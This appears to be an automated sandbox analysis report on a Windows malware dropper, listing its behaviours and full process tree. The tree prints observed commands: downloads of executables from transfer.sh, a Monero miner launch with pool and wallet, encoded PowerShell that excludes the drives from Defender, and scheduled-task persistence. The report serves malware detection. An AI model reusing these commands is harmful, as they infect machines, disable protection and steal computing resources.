Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
05/01/2022, 14:45
Static task
static1
General
-
Target
ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe
-
Size
369KB
-
MD5
4474e6fdd0c681c2b133e850626a4cbf
-
SHA1
943216049e46b9725e33d9268c0f733b1a6c9f9b
-
SHA256
ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c
-
SHA512
6a4f7204d53c13091cbc2eedecc48688047b360fd00686a403f51032120544a51a5494d5541f450d5c9e392b6f0419ce27676fb4f9fb13d3b1aaae752214e51a
Malware Config
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 3960 created 1180 3960 WerFault.exe 78 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
LoaderBot executable 3 IoCs
resource yara_rule behavioral1/memory/1232-141-0x0000000000220000-0x000000000067B000-memory.dmp loaderbot behavioral1/memory/1232-145-0x0000000000220000-0x000000000067B000-memory.dmp loaderbot behavioral1/memory/1232-147-0x0000000000220000-0x000000000067B000-memory.dmp loaderbot -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 668 WScript.exe -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 828 extd.exe 3048 setup_c.exe 2292 extd.exe 1232 setup_m.exe 316 extd.exe 1180 setup_s.exe 1080 extd.exe 1660 Driver.exe 708 build.exe 2292 services.exe -
resource yara_rule behavioral1/files/0x000500000001ab2d-120.dat upx behavioral1/files/0x000500000001ab2d-121.dat upx behavioral1/files/0x000500000001ab2d-127.dat upx behavioral1/files/0x000500000001ab2d-140.dat upx behavioral1/files/0x000500000001ab2d-163.dat upx -
resource yara_rule behavioral1/files/0x000500000001ab61-535.dat vmprotect behavioral1/files/0x000500000001ab61-534.dat vmprotect behavioral1/files/0x000600000001ab65-642.dat vmprotect behavioral1/files/0x000600000001ab65-643.dat vmprotect -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup_s.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion setup_s.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup_m.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup_c.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup_m.exe" setup_m.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup_s.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3048 setup_c.exe 1232 setup_m.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1180 set thread context of 2428 1180 setup_s.exe 79 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 3960 1180 WerFault.exe 78 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1760 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings cmd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3048 setup_c.exe 3048 setup_c.exe 1232 setup_m.exe 1232 setup_m.exe 3960 WerFault.exe 3960 WerFault.exe 3960 WerFault.exe 3960 WerFault.exe 3960 WerFault.exe 3960 WerFault.exe 3960 WerFault.exe 3960 WerFault.exe 3960 WerFault.exe 3960 WerFault.exe 3960 WerFault.exe 3960 WerFault.exe 3960 WerFault.exe 3960 WerFault.exe 2428 AppLaunch.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe 1232 setup_m.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 636 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3048 setup_c.exe Token: SeDebugPrivilege 1232 setup_m.exe Token: SeRestorePrivilege 3960 WerFault.exe Token: SeBackupPrivilege 3960 WerFault.exe Token: SeDebugPrivilege 3960 WerFault.exe Token: SeDebugPrivilege 2428 AppLaunch.exe Token: SeLockMemoryPrivilege 1660 Driver.exe Token: SeLockMemoryPrivilege 1660 Driver.exe Token: SeDebugPrivilege 1240 powershell.exe Token: SeIncreaseQuotaPrivilege 1240 powershell.exe Token: SeSecurityPrivilege 1240 powershell.exe Token: SeTakeOwnershipPrivilege 1240 powershell.exe Token: SeLoadDriverPrivilege 1240 powershell.exe Token: SeSystemProfilePrivilege 1240 powershell.exe Token: SeSystemtimePrivilege 1240 powershell.exe Token: SeProfSingleProcessPrivilege 1240 powershell.exe Token: SeIncBasePriorityPrivilege 1240 powershell.exe Token: SeCreatePagefilePrivilege 1240 powershell.exe Token: SeBackupPrivilege 1240 powershell.exe Token: SeRestorePrivilege 1240 powershell.exe Token: SeShutdownPrivilege 1240 powershell.exe Token: SeDebugPrivilege 1240 powershell.exe Token: SeSystemEnvironmentPrivilege 1240 powershell.exe Token: SeRemoteShutdownPrivilege 1240 powershell.exe Token: SeUndockPrivilege 1240 powershell.exe Token: SeManageVolumePrivilege 1240 powershell.exe Token: 33 1240 powershell.exe Token: 34 1240 powershell.exe Token: 35 1240 powershell.exe Token: 36 1240 powershell.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeIncreaseQuotaPrivilege 2240 powershell.exe Token: SeSecurityPrivilege 2240 powershell.exe Token: SeTakeOwnershipPrivilege 2240 powershell.exe Token: SeLoadDriverPrivilege 2240 powershell.exe Token: SeSystemProfilePrivilege 2240 powershell.exe Token: SeSystemtimePrivilege 2240 powershell.exe Token: SeProfSingleProcessPrivilege 2240 powershell.exe Token: SeIncBasePriorityPrivilege 2240 powershell.exe Token: SeCreatePagefilePrivilege 2240 powershell.exe Token: SeBackupPrivilege 2240 powershell.exe Token: SeRestorePrivilege 2240 powershell.exe Token: SeShutdownPrivilege 2240 powershell.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeSystemEnvironmentPrivilege 2240 powershell.exe Token: SeRemoteShutdownPrivilege 2240 powershell.exe Token: SeUndockPrivilege 2240 powershell.exe Token: SeManageVolumePrivilege 2240 powershell.exe Token: 33 2240 powershell.exe Token: 34 2240 powershell.exe Token: 35 2240 powershell.exe Token: 36 2240 powershell.exe Token: SeDebugPrivilege 3120 powershell.exe Token: SeIncreaseQuotaPrivilege 3120 powershell.exe Token: SeSecurityPrivilege 3120 powershell.exe Token: SeTakeOwnershipPrivilege 3120 powershell.exe Token: SeLoadDriverPrivilege 3120 powershell.exe Token: SeSystemProfilePrivilege 3120 powershell.exe Token: SeSystemtimePrivilege 3120 powershell.exe Token: SeProfSingleProcessPrivilege 3120 powershell.exe Token: SeIncBasePriorityPrivilege 3120 powershell.exe Token: SeCreatePagefilePrivilege 3120 powershell.exe Token: SeBackupPrivilege 3120 powershell.exe Token: SeRestorePrivilege 3120 powershell.exe -
Suspicious use of WriteProcessMemory 54 IoCs
description pid Process procid_target PID 2520 wrote to memory of 2300 2520 ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe 68 PID 2520 wrote to memory of 2300 2520 ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe 68 PID 2300 wrote to memory of 668 2300 cmd.exe 71 PID 2300 wrote to memory of 668 2300 cmd.exe 71 PID 2300 wrote to memory of 828 2300 cmd.exe 72 PID 2300 wrote to memory of 828 2300 cmd.exe 72 PID 2300 wrote to memory of 828 2300 cmd.exe 72 PID 2300 wrote to memory of 3048 2300 cmd.exe 74 PID 2300 wrote to memory of 3048 2300 cmd.exe 74 PID 2300 wrote to memory of 3048 2300 cmd.exe 74 PID 2300 wrote to memory of 2292 2300 cmd.exe 75 PID 2300 wrote to memory of 2292 2300 cmd.exe 75 PID 2300 wrote to memory of 2292 2300 cmd.exe 75 PID 2300 wrote to memory of 1232 2300 cmd.exe 76 PID 2300 wrote to memory of 1232 2300 cmd.exe 76 PID 2300 wrote to memory of 1232 2300 cmd.exe 76 PID 2300 wrote to memory of 316 2300 cmd.exe 77 PID 2300 wrote to memory of 316 2300 cmd.exe 77 PID 2300 wrote to memory of 316 2300 cmd.exe 77 PID 2300 wrote to memory of 1180 2300 cmd.exe 78 PID 2300 wrote to memory of 1180 2300 cmd.exe 78 PID 2300 wrote to memory of 1180 2300 cmd.exe 78 PID 2300 wrote to memory of 1080 2300 cmd.exe 80 PID 2300 wrote to memory of 1080 2300 cmd.exe 80 PID 2300 wrote to memory of 1080 2300 cmd.exe 80 PID 1180 wrote to memory of 2428 1180 setup_s.exe 79 PID 1180 wrote to memory of 2428 1180 setup_s.exe 79 PID 1180 wrote to memory of 2428 1180 setup_s.exe 79 PID 1180 wrote to memory of 2428 1180 setup_s.exe 79 PID 1180 wrote to memory of 2428 1180 setup_s.exe 79 PID 1232 wrote to memory of 1660 1232 setup_m.exe 84 PID 1232 wrote to memory of 1660 1232 setup_m.exe 84 PID 2428 wrote to memory of 708 2428 AppLaunch.exe 86 PID 2428 wrote to memory of 708 2428 AppLaunch.exe 86 PID 708 wrote to memory of 1156 708 build.exe 87 PID 708 wrote to memory of 1156 708 build.exe 87 PID 1156 wrote to memory of 1240 1156 cmd.exe 89 PID 1156 wrote to memory of 1240 1156 cmd.exe 89 PID 1156 wrote to memory of 2240 1156 cmd.exe 91 PID 1156 wrote to memory of 2240 1156 cmd.exe 91 PID 708 wrote to memory of 2496 708 build.exe 92 PID 708 wrote to memory of 2496 708 build.exe 92 PID 2496 wrote to memory of 1760 2496 cmd.exe 94 PID 2496 wrote to memory of 1760 2496 cmd.exe 94 PID 708 wrote to memory of 3188 708 build.exe 97 PID 708 wrote to memory of 3188 708 build.exe 97 PID 3188 wrote to memory of 2292 3188 cmd.exe 99 PID 3188 wrote to memory of 2292 3188 cmd.exe 99 PID 2292 wrote to memory of 680 2292 services.exe 100 PID 2292 wrote to memory of 680 2292 services.exe 100 PID 680 wrote to memory of 3120 680 cmd.exe 102 PID 680 wrote to memory of 3120 680 cmd.exe 102 PID 680 wrote to memory of 1360 680 cmd.exe 103 PID 680 wrote to memory of 1360 680 cmd.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe"C:\Users\Admin\AppData\Local\Temp\ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\C873.bat C:\Users\Admin\AppData\Local\Temp\ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\17064\123.vbs"3⤵
- Blocklisted process makes network request
PID:668
-
-
C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe "/download" "https://transfer.sh/get/W6Ih4d/1.exe" "setup_c.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:828
-
-
C:\Users\Admin\AppData\Local\Temp\17064\setup_c.exesetup_c.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe "/download" "https://transfer.sh/get/An6EhV/2.exe" "setup_m.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:2292
-
-
C:\Users\Admin\AppData\Local\Temp\17064\setup_m.exesetup_m.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
-
C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe "/download" "https://transfer.sh/get/hkrVHT/3.exe" "setup_s.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:316
-
-
C:\Users\Admin\AppData\Local\Temp\17064\setup_s.exesetup_s.exe3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit6⤵
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"7⤵
- Creates scheduled task(s)
PID:1760
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Users\Admin\AppData\Roaming\Microsoft\services.exeC:\Users\Admin\AppData\Roaming\Microsoft\services.exe7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit8⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"9⤵
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="9⤵PID:1360
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 5484⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
-
C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1080
-
-